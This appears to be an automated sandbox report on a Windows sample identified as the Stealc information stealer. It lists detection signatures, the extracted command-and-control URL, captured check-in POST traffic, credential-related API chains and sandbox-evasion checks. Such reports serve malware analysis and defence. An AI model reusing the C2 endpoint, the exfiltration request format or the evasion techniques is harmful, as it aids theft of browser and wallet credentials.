
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541560
MD5: 4af633ceed4aacaf057ea12772b50ad2
SHA1: 2fc5349b3cf3153eb303ec63dae8f9fa53f62909
SHA256: d88360912930f05dad8b9dabaee2ee7a32d568d39566d0b1ef487be6225edefc
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4AF633CEED4AACAF057EA12772B50AD2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author; the Strings column is empty for every row)

dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7628 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7628 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.d80000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)

2024-10-25T00:19:17.598711+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.d80000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D89AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D87240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D89B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D98EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D94570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a
    Data Ascii:
        ------EBKEHJJDAAAAKECBGHDA
        Content-Disposition: form-data; name="hwid"

        5FEF51127C753799621165
        ------EBKEHJJDAAAAKECBGHDA
        Content-Disposition: form-data; name="build"

        doma
        ------EBKEHJJDAAAAKECBGHDA--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D84880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a
    Data Ascii:
        ------EBKEHJJDAAAAKECBGHDA
        Content-Disposition: form-data; name="hwid"

        5FEF51127C753799621165
        ------EBKEHJJDAAAAKECBGHDA
        Content-Disposition: form-data; name="build"

        doma
        ------EBKEHJJDAAAAKECBGHDA--
Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001886000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpDEd
Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpI
Source: file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpzEV
Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/es
Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/sEO
Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37R4

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106297C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011419E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011558B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114D3D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01146A11
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0115427F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0113CA61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0113EAB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01148564
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01091DA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01197C3F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01143442
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011044C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010864D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011524CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B5702
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01144F68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEEE1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114EE37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114C638
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00D845C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: igioonnz ZLIB complexity 0.9951144939472878
Source: file.exe, 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D98680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D93720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\O08ND1U9.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1826816 > 1048576
Source: file.exe | Static PE information: Raw size of igioonnz is bigger than: 0x100000 < 0x197e00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;igioonnz:EW;dimpkies:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;igioonnz:EW;dimpkies:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1be7d6 should be: 0x1ccc8f
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: igioonnz
Source: file.exe | Static PE information: section name: dimpkies
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0123236E push ecx; mov dword ptr [esp], ebx | 0_2_01232F4E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01169901 push 67EB54E3h; mov dword ptr [esp], edi | 0_2_0116A427
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE48BD push 6A1EB33Eh; mov dword ptr [esp], esi | 0_2_00FE8800
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01034946 push edx; mov dword ptr [esp], ecx | 0_2_01034978
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01034946 push eax; mov dword ptr [esp], esp | 0_2_0103497C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01034946 push 3A5A2D81h; mov dword ptr [esp], ecx | 0_2_010349A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01034946 push ebx; mov dword ptr [esp], edi | 0_2_01034A5C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01034946 push 48570159h; mov dword ptr [esp], eax | 0_2_01034AED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EC146 push edx; mov dword ptr [esp], 57CF5B96h | 0_2_011EC165
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106297C push edx; mov dword ptr [esp], eax | 0_2_010629E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106297C push ebx; mov dword ptr [esp], edx | 0_2_01062A09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106297C push 3597BE96h; mov dword ptr [esp], esi | 0_2_01062A18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106297C push ebp; mov dword ptr [esp], 0F825563h | 0_2_01062A68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106297C push eax; mov dword ptr [esp], ebp | 0_2_01062B38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EF195 push 119675C3h; mov dword ptr [esp], esi | 0_2_011EF1D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E31BE push ecx; mov dword ptr [esp], 57DFF332h | 0_2_011E31CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E31BE push ecx; mov dword ptr [esp], 306F52DDh | 0_2_011E31FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69B4 push eax; mov dword ptr [esp], edx | 0_2_011F69DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69B4 push 59B523D7h; mov dword ptr [esp], ebx | 0_2_011F6A57
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69B4 push eax; mov dword ptr [esp], 4B9F2AC0h | 0_2_011F6A71
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69B4 push ebp; mov dword ptr [esp], ebx | 0_2_011F6AB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69B4 push 750E01C1h; mov dword ptr [esp], eax | 0_2_011F6B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69B4 push ebx; mov dword ptr [esp], ebp | 0_2_011F6BCA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012319FB push ebp; mov dword ptr [esp], ebx | 0_2_01231A0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012319FB push edx; mov dword ptr [esp], ebx | 0_2_01231A8C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0122D1C1 push esi; mov dword ptr [esp], edi | 0_2_0122D1CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0122D1C1 push eax; mov dword ptr [esp], ebp | 0_2_0122D2E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0122D1C1 push ebx; mov dword ptr [esp], eax | 0_2_0122D308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0122D1C1 push ecx; mov dword ptr [esp], ebp | 0_2_0122D39B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0122D1C1 push 62687CABh; mov dword ptr [esp], ebx | 0_2_0122D3DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012001C8 push 35CD25D7h; mov dword ptr [esp], ebp | 0_2_012000C5
Source: file.exe | Static PE information: section name: igioonnz entropy: 7.9541328107459774

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13719
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE1FB9, second address: FE1FDB, instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007F5E94E4CBB6h
    0x00000007 pop edx
    0x00000008 pop eax
    0x00000009 pop ebx
    0x0000000a push eax
    0x0000000b push eax
    0x0000000c push edx
    0x0000000d push eax
    0x0000000e push edx
    0x0000000f pushad
    0x00000010 popad
    0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE1FDB, second address: FE1FE1, instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 popad
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115A538, second address: 115A542, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop ebx
    0x00000005 pushad
    0x00000006 pushad
    0x00000007 popad
    0x00000008 push eax
    0x00000009 push edx
    0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115A542, second address: 115A547, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 popad
    0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11598A4, second address: 11598A9, instructions:
    0x00000000 rdtsc
    0x00000002 push ebx
    0x00000003 push eax
    0x00000004 push edx
    0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11598A9, second address: 11598B2, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop ebx
    0x00000005 push eax
    0x00000006 push edx
    0x00000007 push ebx
    0x00000008 pop ebx
    0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11598B2, second address: 11598B8, instructions:
    0x00000000 rdtsc
    0x00000002 push ebx
    0x00000003 pop ebx
    0x00000004 push eax
    0x00000005 push edx
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11598B8, second address: 11598D0, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 pop edx
    0x00000007 pop eax
    0x00000008 push eax
    0x00000009 push edx
    0x0000000a push esi
    0x0000000b jnl 00007F5E94757C96h
    0x00000011 jbe 00007F5E94757C96h
    0x00000017 pop esi
    0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1159A27, second address: 1159A46, instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 popad
    0x00000004 jmp 00007F5E94E4CBB6h
    0x00000009 pop edx
    0x0000000a pop eax
    0x0000000b pushad
    0x0000000c push eax
    0x0000000d push edx
    0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1159D27, second address: 1159D40, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop esi
    0x00000005 push eax
    0x00000006 push edx
    0x00000007 jmp 00007F5E94757CA2h
    0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1159D40, second address: 1159D44, instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1159EAB, second address: 1159ECD, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 jp 00007F5E94757C96h
    0x0000000a push eax
    0x0000000b pushad
    0x0000000c popad
    0x0000000d jl 00007F5E94757C96h
    0x00000013 pop eax
    0x00000014 push edi
    0x00000015 pushad
    0x00000016 popad
    0x00000017 pushad
    0x00000018 popad
    0x00000019 pop edi
    0x0000001a jnp 00007F5E94757C9Ch
    0x00000020 push eax
    0x00000021 push edx
    0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115D921, second address: 115D92B, instructions:
    0x00000000 rdtsc
    0x00000002 jo 00007F5E94E4CBACh
